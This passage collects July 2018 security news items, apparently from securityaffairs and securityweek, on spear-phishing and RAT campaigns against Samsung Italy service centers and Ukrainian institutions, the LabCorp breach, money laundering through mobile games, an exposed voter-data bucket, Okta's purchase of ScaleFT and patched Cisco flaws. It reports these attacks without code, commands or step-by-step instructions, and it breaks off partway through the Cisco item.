Experts highlighted that the spoofing attacks could be very effective, 40 volunteer drivers involved in a trial found that 95 per cent of the time the attackers were able to trick the targets into following the fake routes.

Such kind of attacks could be particularly dangerous especially when dealing with self-driving cars and trucks.

Researchers provided also countermeasures to prevent the attacks such as the use of encrypted data also for civilian GPS signals.


Cyber espionage campaign targets Samsung service centers in Italy
19.7.2018 securityaffairs CyberSpy

Security researchers from Italian security firm TG Soft have uncovered an ongoing malware campaigns targeting Samsung service centers in Italy.
“TG Soft’s Research Centre (C.R.A.M.) has analyzed the campaign of spear-phishing on 2 april 2018 targeting the service centers of Samsung Italy.” reads the analysis published by TG Soft.

“The campaign analyzed is targeting only the service centers of Samsung Italy, it’s an attack multi-stage and we have monitored it until July 2018″
The campaign has similarities with the attacks campaigns that targeted similar electronics service centers in Russia that was discovered by Fortinet in June. The attackers’ motivation is still unclear, experts explained that the malicious code is not particularly sophisticated.

The attackers used spear-phishing emails sent to Samsung Italy service center workers. The messages have attached weaponized Excel documents.

The documents trigger the CVE-2017-11882 Office Equation Editor vulnerability to infect users.
According to a technical report published by the experts, this attack and the one against Russian service centers offering maintenance and support for various electronic goods started in the same period, in March.

While Russian service centers were hit by the Imminent Monitor RAT, the attacks on Samsung Italy service centers also involved other RATs, such Netwire and njRAT.

The quality of the spear phishing messages was high in both campaigns, they appear to have been written by a native in Italian and Russian, respectively.

The attachment used in this campaign is an Excel document titled “QRS non autorizzati.xlsx,” while the phishing messages are signed with the name of the Samsung IT Service Manager, a real employee of Samsung Italia, and includes the email and phone numbers of the employee.

Samsung service centers

At the time, the experts were not able to attribute the attack to a specific threat actor. The electronics service centers appear not particularly interesting for attackers because the volume of data it manage is little.

Probably the attackers want to compromise remote management tools used by these services in order to gain control over the computers of the customers that request support to the electronics service centers.

“Command and control servers use services like noip.me or ddns.net, which in combination with a VPN, allow hiding the IP address of the server where the exfiltrated data is sent.” concludes the report.
“During the analysis in some cases, the C2 servers were not online and the RAT failed to contract them, and then returns active after a few tens of hours with a new IP address.
The actors behind this attack remain unknown …”

The Italian version of the report that includes also the IoCs is available here.


QUASAR, SOBAKEN AND VERMIN RATs involved in espionage campaign on Ukraine
19.7.2018 securityaffairs
Virus

Security experts from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions and involving three different RATs, including the custom-made VERMIN.
Security researchers from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions, attackers used at least three different remote access Trojans (RATs).

The campaign was first spotted in January by experts from PaloAlto Networks when the researchers discovered a new piece of malware tracked VERMIN RAT targeting Ukraine organizations.

“Pivoting further on the initial samples we discovered, and their infrastructure, revealed a modestly sized campaign going back to late 2015 using both Quasar RAT and VERMIN.” reads the report from PaloAlto Networks.

VERMIN RAT 2

Back to the present, the experts discovered that the attackers used several RATs to steal sensitive documents, the researchers collected evidence of the involvement of the Quasar RAT, Sobaken RAT, and Vermin.

The Quasar RAT is available for free on GitHub, many other attackers used it in their campaigns, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats. Sobaken is an improved version of Quasar RAT, that includes several anti-sandbox and other evasion mechanisms.

The RATs have been used against different targets at the same time, experts noticed they share some infrastructure and connect to the same C&C servers.

VERMIN RAT

The threat actors don’t have advanced skills, their attack vector is spear phishing messages and they have been quite successful in using social engineering to lure victims into opening the email and downloading and executing the malicious codes.

“Even though these threat actors don’t seem to possess advanced skills or access to 0-day vulnerabilities, they have been quite successful in using social engineering to both distribute their malware and fly under the radar for extended periods of time.” Reads the analysis published by ESET.

“We were able to trace attacker activity back to October 2015; however, it is possible that the attackers
have been active even longer. These attackers use three different .NET malware strains in their attacks – Quasar RAT, Sobaken (a RAT derived from Quasar) and a custom-made RAT called Vermin. All three malware strains have been in active use against different targets at the same time, they share some infrastructure and connect to the same C&C servers.”

Some emails carried weaponized Word documents attempting to exploit CVE-2017-0199, attackers used a dropper masquerades as a legitimate software (i.e. Adobe, Intel or Microsoft) to deliver the final payload.

The threat actors used a scheduled task that executes the malware every 10 minutes to achieve persistence on the infected machine.

“The installation procedure is the same for all three malware strains used by these attackers. A dropper drops a malicious payload file (Vermin, Quasar or Sobaken malware) into the %APPDATA% folder, in a subfolder named after a legitimate company (usually Adobe, Intel or Microsoft).” continues the report.

“Then it creates a scheduled task that runs the payload every 10 minutes to ensure its persistence.”

Since mid-2017, the threat actors adopted steganography to bypass content filtering by hiding the payloads in images that were hosted on the free image hosting websites saveshot.net and ibb.co.

The malicious code executed only on hosts where the Russian or Ukrainian keyboard layouts are installed, it also checks the IP address and the username on the target machine.

To avoid automated analysis systems, that often use tools like Fakenet-NG where all DNS/HTTP communication succeeds and returns some result, the malware generates a random
website name/URL and attempt to connect it. If the connection fails in some cases the system could be considered real and not a virtualized environment used by researchers.

“Among the many different malware attacks targeted at high value assets in Ukraine, these attackers haven’t received much public attention – perhaps because of their initial use of open-source-based malware before developing their own strain (Vermin).” concludes the report.

“Employing multiple malware families, as well as various infection mechanisms – including common social engineering techniques but also not-so-common steganography – over the past three years, could be explained by the attackers simply experimenting with various techniques and malware, or it may suggest operations by multiple subgroups.”

Further details on the campaign, including the IoCs are included in the report.


US Biggest Blood Testing Laboratories LabCorp suffered a security breach
19.7.2018 securityaffairs Incindent

Hackers have breached the network at LabCorp, one of the largest diagnostic blood testing laboratories in the US, millions of Americans potentially at risk.
The biggest blood testing laboratories network in the US, LabCorp has suffered a security breach. The company announced the incident on Monday, the security breach occurred over the weekend.

The hackers breached into the LabCorp Diagnostic systems, but the company says there’s no indication that attackers compromised also the systems used by its drug development business Covance.

“At this time, there is no evidence of unauthorized transfer or misuse of data. LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation,” it said, in its statement.

LabCorp did not share further details about the security breach, in response to the incident the company shut down part of its infrastructure.

“LabCorp immediately took certain systems offline as part of its comprehensive response to contain the activity,” the firm said in a 8-K filed with the Securities and Exchange Comission.

“This temporarily affected test processing and customer access to test results over the weekend. Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed today, and we anticipate that additional systems and functions will be restored through the next several days,”

Biggest Blood Testing Laboratories LabCorp
Mike Thomas, a technologist at LabCorp, works with patient samples at the company’s location in Burlington. JULIE KNIGHT – Source www.bizjournals.com

The company is currently testing operations that have been resumed, other suctions will be fully restored in the next days, meantime some customers may face brief delays.

“We anticipate that additional systems and functions will be restored throughout the next several days,” it added. “Some customers of LabCorp Diagnostics may experience brief delays in receiving results as we complete that process.”

The hack might have severe consequences for millions of Americans due to the potential extent of the breached networks that connects thousands of hospitals and testing facility offices worldwide.


How crooks conduct Money Laundering operations through mobile games
19.7.2018 securityaffairs Mobil

Experts uncovered a money laundering ring that leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards.
A money laundering ring leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards and then sells these game premiums on online forums and within gaming communities.

The money laundering operation was unveiled by the US Department of Justice, the investigation started in mid-June when the experts from Kromtech Security discovered a MongoDB database exposed online. The database was containing information related to carders’ activities, the database contained 150,833 unique cards records (card number, expiration date, and CCV)

“Following our MongoDB investigations and honey pots deployments from the beginning of this year, we did another round of security audit of unprotected MongoDB instances. In June 2018 we have spotted a strange database publicly exposed to the public internet (no password/login required) along with a large number of credit card numbers and personal information inside.” reads the blog post published by Kromtech Security.

“As we examined the database we rapidly became aware that this was not your ordinary corporate database, this database appeared to belong to credit card thieves (commonly known as carders) and that it was relatively new, only a few months old. So we dug much deeper.”

The activity of the criminal gang behind the operation is simple as effective. Crooks used a special tool to create iOS accounts using valid emails accounts, then they associated with the accounts the stolen payment cards. Most of the created accounts are specific to users located in Saudi Arabia, India, Indonesia, Kuwait, and Mauritania.

The group then made the jailbreaking of iOS devices to install various games, create in-game accounts, and use them to purchase game features or premiums.

The cash out was made later when crooks re-sold the game features or premiums online for real money.

Experts found credit cards belong to 19 different banks, they speculated they were probably bought on the specific carder markets where they were offered in groups of 10k, 20k, 30k.

The list of mobile games used by the cybercriminals includes popular apps such as Clash of Clans and Clash Royale developed by Supercell, and Marvel Contest of Champions developed by Kabam.

The three apps have a gaming community of over 250 million users and generate approximately $330 million USD a year in revenue. Associated third-party markets are very active, websites like g2g.com to allow gamers to buy and sell resources and games, a great opportunity for crooks involved in money laundering.

money laundering games

“It is interesting to note that these three games are not even in the top five games. Scaling this scheme across other popular apps and games with in-app purchases places the potential market well into the billions of dollars USD per year.” reported Kromtech Security.

App Offered by Android Users Release Metacritic score In-app Products price per item Daily revenue $
Yearly revenue

Clash of Clans Supercell 100 000 000+ 2012 74/100 $0.99 – $99.99 per item 684 002 250M
Clash Royale Supercell 100 000 000+ 2016 86/100 $0.99 – $99.99 per item 153 150 56M
Marvel Contest of Champions Kabam 50 000 000+ 2014 76/100 $0.99 – $99.99 per item 64 296 23.5M
The experts also found that the Apple was employing lax credit card verification process when users add payment card data to iOS accounts, advantaging fraudulent activities. The experts noticed that cards with improper names and addresses were approved by Apple, for this reason, they notified their discovery to Apple.

The experts also highlighted that game makers do not implement necessary measures to prevent such kind of abuses. For example, the game makers do not control the interaction of tools like Racoonbot with Supercell games that are used to automate the premium feature buying operations.

“Raccoonbot.com is an automated bot dedicated to Supercell’s Clash of the Clans. It advertises itself in it’s forum as a way to “Become rich at Clash of the Clans”. This is done by automating the game and selling the gems. It can potentially be used in conjunction with MaxTooliOS to further enhance the profit from the stolen credit cards. It’s a direct violation of Supercell policy, it aids in laundering money, and it also remains in operation.” continues the analysis.

“iGameSupply is an approved marketplace for selling Racoonbot generated gems https://www.raccoonbot.com/forum/forum/80-approved-marketplace/“


Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.2018 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.

The researcher Bob Diachenko from Kromtech Security discovered the company database exposed online. The expert was using the online service GrayhatWarfare that could be used to search publicly exposed Amazon Web Services data storage buckets.

The company offers for sale voter records for a price of 3¢/record, the same data that left exposed online.

Querying the system for the term “voters” he found the AWS bucket used by RoboCent.

The bucked discovered by the expert contained 2,584 files, exposed voters’ data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Gender
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education
RoboCent exposed data

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered a massive US voter data online, apparently being part of Robocent, Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company that quickly secured the bucket, below the message sent by a developer of the company that solved the issue.

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This isn’t the first case of unsecured Amazon S3 buckets exposed online, in June 2017 DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.

In December 2017, Diachenko discovered another an exposed MongoDB database containing voter registration data for more than 19 million California residents.


Okta Acquires Access Control Startup ScaleFT
19.7.2018 securityweek  IT   

Enterprise identity management firm Okta this week announced that it has acquired ScaleFT, a company that offers a Zero Trust access control platform.

Okta provides a Single Sign-On (SSO) solution to help customers efficiently manage user accounts across the enterprise and eliminate passwords while simplifying access. With Multi-factor Authentication (MFA), it provides strong authentication various services, with over 5,500 pre-built integrations to applications and infrastructure providers.

Okta Logo

Founded in 2015, ScaleFT’s access management platform was inspired by Google’s BeyondCorp security model, which provides remote access without the use of a VPN (virtual private network).

With this acquisition, publicly traded Okta (NASDAQ:OKTA), which already helps over 4,700 organizations both secure and manage their extended enterprise, plans to bring Zero Trust to corporations with a framework to protect sensitive data without compromising on experience.

By combining ScaleFT’s Zero Trust platform with its own Identity Cloud, Okta aims to help organizations easily validate users, devices, application and network information while also securing access to data from cloud to ground.

“Companies have realized they can no longer trust their network and have to understand device security — instead of trusting everyone behind a firewall, now IT and security leaders must trust no one, inside or outside the organization,” Frederic Kerrest, Chief Operating Officer and co-founder, Okta, said.

“To help our customers increase security while also meeting the demands of the modern workforce, we’re acquiring ScaleFT to further our contextual access management vision — and ensure the right people get access to the right resources for the shortest amount of time,” Kerrest continued.

The Zero Trust security paradigm requires organizations to move away from the traditional approach of perimeter-based security that included static credentials and access controls, and to focus on adaptive and context-aware controls instead, for making continuous access decisions.

Following the acquisition, ScaleFT CEO and co-founder Jason Luce will manage the transition, while CTO and co-founder Paul Querna will lead strategy and execution of Okta's Zero Trust architecture. Marc Rogers, CSO, will join Okta as Executive Director, Cybersecurity Strategy.


Cisco Finds Serious Flaws in Policy Suite, SD-WAN Products
19.7.2018 securityweek 
Vulnerebility

Cisco informed customers on Wednesday that it has found and patched over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The networking giant reported discovering four critical flaws in Policy Suite during internal testing. Two of these security holes are unauthenticated access issues that allow a remote attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Once they gain access to the Policy Builder interface, which is exposed due to a lack of authentication, attackers can make changes to existing repositories and create new repositories. The OSGi interface allows an attacker to access or change any file accessible by the OSGi process.

The lack of an authentication mechanism also exposes the Policy Builder database, allowing an attacker to access and change any data stored in it.

Cisco also discovered that the Cluster Manager in Policy Suite has a root account with default and static credentials. A remote attacker can log in to this account and execute arbitrary commands with root privileges.

These critical Policy Suite vulnerabilities are tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376 and CVE-2018-0377.

Cisco has also fixed a total of seven flaws in its SD-WAN solution. The only one of these vulnerabilities that can be exploited remotely without authentication impacts the Zero Touch Provisioning service and it allows an attacker to cause a denial-of-service (DoS) condition.

The other SD-WAN security holes, which require authentication, can be exploited to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges. One of the SD-WAN bugs requires both authentication and local access for exploitation.

Cisco also informed customers that its Nexus 9000 series Fabric switches, specifically their DHCPv6 feature, are impacted by a high severity flaw that can be exploited by a remote and unauthenticated attacker to cause a DoS condition.

The company has also assigned a high severity rating to multiple vulnerabilities affecting the Cisco Webex Network Recordin